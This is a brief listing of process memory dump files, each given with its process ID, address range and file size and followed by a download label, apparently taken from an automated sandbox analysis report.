memory/2964-612-0x00007FF987250000-0x00007FF987269000-memory.dmp

Filesize
100KB

Download
memory/3144-63-0x00000201F5D20000-0x00000201F5D42000-memory.dmp

Filesize
136KB

Download
memory/4236-813-0x00007FF96F280000-0x00007FF96F5F4000-memory.dmp

Filesize
3.5MB

Download
memory/4236-567-0x00007FF96FD10000-0x00007FF970175000-memory.dmp

Filesize
4.4MB

Download
memory/4236-616-0x00007FF96F280000-0x00007FF96F5F4000-memory.dmp

Filesize
3.5MB

Download
memory/4236-617-0x00007FF97FB70000-0x00007FF97FC26000-memory.dmp

Filesize
728KB

Download
memory/4236-786-0x00007FF980090000-0x00007FF9800BE000-memory.dmp

Filesize
184KB

Download
memory/4236-1184-0x00007FF9684B0000-0x00007FF968C51000-memory.dmp

Filesize
7.6MB

Download
memory/4236-1127-0x00007FF96C0A0000-0x00007FF96C0D6000-memory.dmp

Filesize
216KB

Download
memory/4236-1177-0x00007FF9746D0000-0x00007FF9746F2000-memory.dmp

Filesize
136KB

Download
memory/4236-1191-0x00007FF96C0A0000-0x00007FF96C0D6000-memory.dmp

Filesize
216KB

Download